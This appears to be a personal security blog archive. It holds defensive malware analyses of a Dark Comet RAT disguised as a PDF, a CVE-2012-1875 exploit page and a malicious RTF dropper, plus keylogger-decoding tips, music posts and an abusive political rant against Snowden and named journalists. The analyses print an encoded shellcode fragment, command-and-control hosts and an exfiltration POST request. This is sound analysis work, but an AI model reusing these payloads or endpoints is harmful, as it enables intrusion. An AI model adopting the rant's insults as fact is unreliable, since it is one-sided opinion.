Tuesday, June 11, 2013

Snowden is NOT a hero, but rather the lowest form of scum on the planet!!!

I haven't blogged anything in quite awhile, because I've been busy with other work and projects, but I feel compelled to get this off my chest.  Edward J Snowden (it makes me ill to speak or type his name), is no hero, but rather a traitor.  In my book he is no different that John Walker, Robert Hanson and Aldrich Ames, etc.  No, I take that back, I believe he's actually worse, because his treasonous act was a deliberate attempt to damage the United States and he knows it.  Why else did the chicken-shit bastard run to Hong Kong?  He should be convicted of treason and punished to the highest extent of the law.

Not only that, I believe the low-life reporters, Glenn Greenwald and Laura Poitras, should be prosecuted as accessories to the crime.  How would they feel if one of their co-workers stole their notes on every story they were working on, then sold those notes to a competitor that beat them to the punch, thus receiving all the "financial rewards".  Would Greenwald and Poitras applaud that effort and would they call that person a hero or would they seek justice - demanding the thief be prosecuted?  I bet they'd vote on the latter.  Greenwald and Poitras, if you are reading this, you make my skin crawl just as much as Snowden, because your type of journalism is damaging whether you want to admit it or not.  History has shown time and time again that the media's total disregard for security and safe-guarding on going investigations has led to successful acts of violence that include terrorist attacks.

As for all those with the "public has the right to know everything" mindset, think about this.  Suppose there were indications of plans for a violent act in your city, but someone leaked that information to the press and the press reported it.  As a result, the suspect got away, only to return months later to carry out their plan which ultimately led one or some of your loved ones meeting a tragic demise.  Would you still feel it was a good thing that the public was made aware of everything?  I think not.

And lastly, the above scenario is one that would be of interest with regards to security.  Believe me, anyone in that field has no interest, nor the time, to read all your email to Aunt Sally or to review all your phone calls or web surfing activity, etc unless something triggers an alert warranting further investigation by the appropriate authorities.

Well, I now feel better getting that off my chest, but at least I didn't betray my country in doing so.

Tuesday, December 4, 2012

Manually Decoding Keylogged Data Files: One Man's Technique

Have you ever found yourself in a time-crunch when your boss needs your analysis yesterday?  I think it's safe to assume the vast majority of us have all been in that situation before.  Well, the other day was no different for me except that I was looking a custom packed keylogger while drinking my morning java before heading into work, hence my time-crunch.

As it turned out, the keylogger encoded it's output and I really wanted to see what it was keylogging, but I didn't have time to throw the binary into my debugger, unpack it, step through it until I found the key, then decode the output.  So, I ended up just "eyeballing" the output file until I found it the key.  I've also done this with keylogged data files I extracted from compromised hard drives when the actual keylogger was no longer present.  In view of this, I'd like to share this simple technique as it may come in handy for someone who is pressed for time or for someone who conducts behavioral malware analysis, but isn't proficient with debuggers or dissassemblers.

The first thing I do is run the binary dynamically to see what footprint it leaves and to see what network traffic it spawns.  I also look for the presence of keylogging.  To that end, I'll open notepad and start typing "trash talk" in case there's a keylogger, but I'll always successively hit the "return" key at least eight times which will create 16 bytes.  I'll also throw in a series of backspaces for good measure.  This way, if it is keylogging and if the output is obfuscated, I should be able to see those returns and backspaces.  For example, since the return key generates \x0D \x0A (carriage return, newline), I look for a series of double byte combinations in my hex editor.  So when I see something like 98 9F 98 9F 98 9F, I'll assume those might be my XOR'd return bytes.  To find the key, I XOR one byte with what I believe it should decode to so in this case I'll XOR \x98 with \x0D and that result represents my probable key.  I then XOR the entire keylogged data file with the probable key and if I can read the file, it's correct.  In the example below, the double byte pattern can be seen at offset 80 and the XOR key in this case was \xA2

 Now back the other morning I spoke of earlier.  The encoded keylog data wasn't as straight forward as the example above.  I did see a double byte pattern, \x88 \x85, but I quickly found that a single byte XOR key wasn't used.  I then figured it would be a rolling XOR key, but that wasn't it either.  After looking at it a bit further, I thought it might be a byte for byte substitution key, but as luck would it, I was out of time and had to get ready for my day job.  While I was getting ready however, it hit me.  It wasn't using a substitution key, it was using addition to encode its output.  So I finished getting ready, ran downstairs and subtracted \x0D from \x88 which gave me \x7B.  I then subtracted \x7B from \x85 and sure enought, I got \x0A.  So my keylogger turned out to add \x7B to every keylogged byte.  I then let python do the math for me and decoded the keylogged output file.  After that, I finished my coffee, logged off, and went to work.

Below is a the encoded and decoded keylog data which is from a bifrost variant.  The double byte patterns can been seen in multiple places, but they stand out at offsets 0, 81 and C2

Thursday, November 29, 2012

Heyoka: A Classic Rock "Must Have" from San Antonio

If you were rockin' in south Texas during the late seventies/early eighties you're probably quite familiar with the San Antonio band Heyoka.  They opened for just about every major Rock band to hit San Antonio, to include Rush.  More importantly though, they never refused to kicked ass!  However, to my knowledge they only released a few 7" singles, of which I am extremely proud to have the one pictured below (keep reading for the Good News).

Fast forward about 30 years and some of their music has finally been released on CD and Vinyl.  So if you're a Heyoka fan or you get into groups like Jethro Tull, Kansas and Rush, I highly recommend you visit the link below and pick up Heyoka's "The Spirit of Revelation" CD and/or the Vinyl.  The vinyl contains two extra songs. 


You should also check out "http://www.reverbnation.com/patrickhoodandheyoka/songs".  You can stream Heyoka and rock out as you reverse the latest 0-day.  Also, the reverbnation page has a couple songs not on the CD or Vinyl, of which my personal favorite (in case you must know) is "Whot Boogie?".

Now let's get back to some malware...

Tuesday, July 10, 2012

Dark Comet "PDF" (pdf? - yea, right!)

Last weekend I pulled down "Dark Comet RAT"-related sample from contagio(http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html#more) to look at and found it to be interesting because it was operating under the guise of a PDF.

The malicious file (er PDF), shown below, employs the Right-to-Left Override (RLO) technique in order to mask the actual file type on a victim host susceptible to RLO.  In the case of this file, analysis was conducted from within a Windows XP virtual machine, and since Windows XP doesn’t interpret this RLO technique, the file immediately appeared in its true state, when viewing file extensions (see diagram 1).

Conversely, on a Windows 7 platform, the RLO technique is understood.  Therefor the malicious file would appear to be a regular PDF file to the unsuspecting user (see diagram 2).

Be that as it may, if the user (on whichever platform) were to notice the item type “Screen saver”, when using the Explorer “tiles” view (see diagram 3), an alarm bell should immediately sound since a SCR file is an executable binary.

The RLO technique has been used quite a bit in recent years to obfuscate the name of a malicious file.  It works by inserting Unicode (U+202e) at a desired point, after which everything will appear in reverse (or right to left order).  For example, the Unicode character was placed in front of the letter “f” in fdp.scr (hence the “square” in diagram 1), making it read as “rcs.pdf” (in diagram 2).

Closer examination of the SCR file;  however, revealed it was actually a WinRAR Self-extracting (SFX) compressed archive file containing three objects which would be extracted with the SFX script display in diagram 4.


Upon execution of the "PDF", the contents are automatically extracted to the user’s %temp% directory (see diagram 5).  Notice the lack of icon for “Explorer.exe”


Immediately thereafter, the malicious “Explorer.exe” is launched along with the benign PDF, but all the victim user would see during all this would be the opening of the benign PDF – a portion of which is displayed in diagram 6. 


In addition, the malware injects itself into a “svchost.exe” process which invokes a keylogger straight away that writes unencrypted keylog data to “%temp%\dclogs.sys” (see appendix for an example of the keylog data).

The victim system then connects to "meroo.no-ip.org", however, no specific http request was observed during this analysis.  More importantly, another svchost process is spawned (svcHost.exe – note the upper case “H”) which opens a dedicated backdoor on port 778 (see diagram 7) in which the victim host reaches out to IP address

1688  svcHost        ->  1060  TCP   c:\Windows\system32\svcHost.exe   (capital H)
TCP         SYN_SENT        1688

Since this analysis was conducted from within an enclosed environment, any follow on communication between the victim host and command and control server was not observed during this analysis.

To maintain persistency on the victim host, the following registry key is created:
C:\Documents and Settings\<user>\Start Menu\Programs\Startup
Interestingly, the Startup folder contains a link file "(Empty).lnk" which points to
"C:\Documents and Settings\<user>\Local Settings\Temp\Explorer.exe" (see diagram 9).


Below is a chronological gist of activity as it occurs on a victim host (of note, the malicious dropper was renamed “asfdp.scr” for ease of interpretation):



-> C:\Documents and Settings\<user>\Local Settings\Temp\Explorer.exe

-> C:\Documents and Settings\<user>\Local Settings\Temp\msdlg.ocx

-> C:\Documents and Settings\<user>\Local Settings\Temp\registry:


-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{2ae4eccf-38d9-11dd-8e16-806d6172696f}\BaseClass

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{2ae4eccd-38d9-11dd-8e16-806d6172696f}\BaseClass

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{2ae4eccc-38d9-11dd-8e16-806d6172696f}\BaseClass

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal

-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common Documents

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop

-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common Desktop

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Start Menu

-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common Start Menu

-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common AppData

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\My Pictures

-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\CommonPictures

-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\CommonMusic

-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\CommonVideo


-> C:\Documents and Settings\<user>\Start Menu\Programs\Startup\(Empty).lnk

registry: SetValueKey

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies

Process: created

-> C:\Documents and Settings\<user>\Local Settings\Temp\Explorer.exe

-> C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe

Explorer.exe (malicious variant in %temp%)

process: terminated

-> C:\Documents and Settings\<user>\Desktop\asfdp.scr

process: created

-> C:\WINDOWS\system32\svchost.exe


-> C:\Documents and Settings\<user>\Local Settings\Temp\~DF8DB9.tmp


process: terminated

-> C:\Documents and Settings\<user>\Local Settings\Temp\Explorer.exe


-> C:\Documents and Settings\<user>\Local Settings\Temp\dclogs.sys

And lastly, here's a sample of the keylogged data:


@ Caption : [C:\WINDOWS\system32\cmd.exe]

@ at 7:42:52 AM the 7/6/2012



@ Caption : [shell]

@ at 7:43:36 AM the 7/6/2012

netstat -ano



@ Caption : [areyoukeylogginme.txt - Notepad]

@ at 7:49:45 AM the 7/6/2012

Seriously????  You're keylogging me????   Ane [<-][<-]d you didn't think I'd notice????  Shame on you :(



@ Caption : [shell]

@ at 7:55:56 AM the 7/6/2012

cd ..

find /i "dclogs" c        [<-][<-][<-][<-][<-][<-]p       | more

find "[<-]/i "explorer.exe" c [<-][<-][<-][<-][<-][<-]pa     [<-]t    | more



@ Caption : [Program Manager]

@ at 7:57:25 AM the 7/6/2012


Wednesday, June 27, 2012

Music To Reverse To

If you're like me, you like some good tunes filling the air while reversing a pesky piece of malware.  However, I find that sometimes the vocals interfere with my train of thought, which is why I found it so cool when I stumbled across Dream Theater's "Train of Thought Instrumental Demos" album.  It's awesome and it didn't interfere one bit with my, huh, train of thought (I never thought I'd say that three times in the same paragraph).

Anyway, the album is awesome and since Dream Theater always incorporates alot of instrumental dialogue, you can listen to a track without the words and still enjoy it, because it's not like listening to the same 8 bars over and over again.  And now that I think about it, another one of their ablums that would be great to "reverse" to would be "Black Clouds & Silver Linings CD3".  It's the instrumental versions of CD1, which is awesome.  And lastly, if you like progressive metal instrumentals, check out "Liquid Tension Experiment" which features some Dream Theater personnel.  Well, gotta run for now.  Until next time...

Wednesday, June 20, 2012

CVE-2012-1875 Encoded Reach Back Decoding

One of the first things I do when I get a new exploit sample (e.g. CVE-2012-1875), is try to determine what (or where) the payload is, after which I'll try to obtain it for further analysis.  In the case of the two samples provided by Contagio (http://contagiodump.blogspot.com/2012/06/cve-2012-1875-links-and-samples.html), I looked through the html pages in search of an "in the clear" redirect or a script.  Immediately, the variable "vbc" jumped out at me (see snippet below).

var vbc =("NewYoukv10EBNewYoukv4B5BNewYoukvC933NewYoukvB966NewYoukv0171NewYoukv3480NewYoukv110BNewYoukvFAE2NewYoukv05EBNewYoukvEBE8NewYoukvFFFFNewYoukvF8FFNewYoukv1013NewYoukv1111NewYoukv754E"+

The first thing that stands out is the delimiter "NewYoukv".  Once removed, we end up with something like this:

When approaching this in this manner, however, don't forget to swap the bytes (remember our good friend unicode?).  This will give us something like this:

Or, we can always look down the html script a little to see what's going on with this variable:
- var xbc=vbc.replace(/NewYoukv/g,"%u");   
- var gjb=unescape(xbc);

We're not quite out of the woods yet though.  This is because we still need to XOR the script with 0x11 to reveal the reach back to the malicious payload.  The two pics below show a "before and after" comparison of the tail section of two different samples - the reach back is revealed in the "decoded" section.  Now all we gotta do is grab the two executable for analysis (before they are taken down) and implement the appropriate mitigation strategies.

Thursday, June 14, 2012

Quick Malware Notes: "WPCT Action Plan from Environment Group.doc" (payload operates under the guise of itunes)

A few days ago, Contagio  Malware Dump posted 90 malware samples (http://contagiodump.blogspot.com/2012/06/90-cve-2012-0158-documents-for-testing.html#more).  My wife wondered why my mouth was drooling.  I told her it was a geek thing and she "cool" then went back to playing Angry Birds.

Anyway, I've only had time to look at one out of the 90 so far, but the one I picked turned out to be a little interesting.  I say that because the malicious RTF file, drops "winword.exe" on the victim host, which further drops "itunes.exe" on the system, both of which are malicious and not what they appear to be (by file name).  In addition, a registry key (see below) is created for persistency. 

HKU\S-1-5-21-2052111302-413027322-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Run\SysUpdate: "C:\Documents and Settings\<user>\Local Settings\Application Data\itunes.exe"

Since most users probably have itunes loaded, this would not probably appear malicious, if they noticed it running - they'd probably just think itunes was looking for updates.

Due to my having to get to my day job, I wasn't able to dive into the code yet, but I was able to take a quick behavioral look at this, and here's a chronological gist of what happens on a compromised system:

Upon execution of "WPCT  Action Plan from Environment Group.doc"...

explorer.exe (legit process)
process: created
-> C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE

WINWORD.EXE (in office11 - legit process)
file: Write
-> C:\Documents and Settings\<user>\Desktop\~$H WPCT  Action Plan from Environment Group.doc
-> C:\Documents and Settings\<user>\Local Settings\Temp\Winword.exe
-> C:\Documents and Settings\<user>\Desktop\6TH WPCT  Action Plan from Environment Group.doc
process: created
-> C:\Documents and Settings\<user>\Local Settings\Temp\Winword.exe

Winword.exe (in %Temp% - malicious)
registry: SetValueKey
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Local AppData
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{2ae4eccf-38d9-11dd-8e16-806d6172696f}\BaseClass
file: Write
-> C:\Documents and Settings\<user>\Local Settings\Application Data\itunes.exe
process: created
-> C:\Documents and Settings\<user>\Local Settings\Application Data\itunes.exe
process: created C
-> C:\WINDOWS\system32\cmd.exe

cmd.exe (legit process, but used by malware)
process: created
-> C:\WINDOWS\system32\reg.exe
process: terminated C
-> C:\WINDOWS\system32\reg.exe

reg.exe (legit process, but used by malware)
registry: SetValueKey
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SysUpdate

Winword.exe (%Temp% - malicious)
process: terminated
-> C:\WINDOWS\system32\cmd.exe

itunes.exe (malicious)
registry: SetValueKey
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Recent
registry: SetValueKey
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{2ae4eccf-38d9-11dd-8e16-806d6172696f}\BaseClass
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{2ae4eccd-38d9-11dd-8e16-806d6172696f}\BaseClass
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{2ae4eccc-38d9-11dd-8e16-806d6172696f}\BaseClass
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache
-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Directory
-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Paths
-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1\CachePath
-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2\CachePath
-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3\CachePath
-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4\CachePath
-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1\CacheLimit
-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2\CacheLimit
-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3\CacheLimit
-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4\CacheLimit
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\History
-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common AppData
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MigrateProxy
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
registry: DeleteValueKey
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
registry: SetValueKey
-> HKLM\SYSTEM\ControlSet001\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet


POST /im/linux.php HTTP/1.1
Host: www.maintechy.com
Content-Length: 2281
Cache-Control: no-cache

After I'm able to take a deeper look at this, I'll update this post accordingly.


File: 6TH WPCT  Action Plan from Environment Group.doc
Size: 167856
MD5:  e836e9ee613bbebfe076ce67c589ae3c
SHA1: 64c2e4384b7ebbdc040453394b203e5d7f0254db

File: Winword.exe
Size: 129536
MD5:  4467369a848fee1424494833237e7b42
SHA1: d7b9f6679ad14b098b41bb80120c97df0e9fa9f7
ssdeep: 3072:Oe5amp1VKNM4kA2xIM7wqEBAMQw8SupZth3pz9:KmpGvpM4AMQw8F7
Compile Time: 4F62A02C (Fri, 16 March 2012 02:06:36 UTC)

File: itunes.exe
Size: 73216
MD5:  972c692625bd57f0c7264c9e048752f6
SHA1: bb9ede8d7243060736a481bee3e0acb2b3b8efd3
ssdeep: 1536:DkXcS22xQxM7K9BqEdDAGlPnI4A7Dte+Rk0SuPxZth3pz:DkA2xIM7wqEBAMQw8SupZth3pz
Compile Time: 4F629F39 (Fri, 16 March 2012 02:02:33 UTC)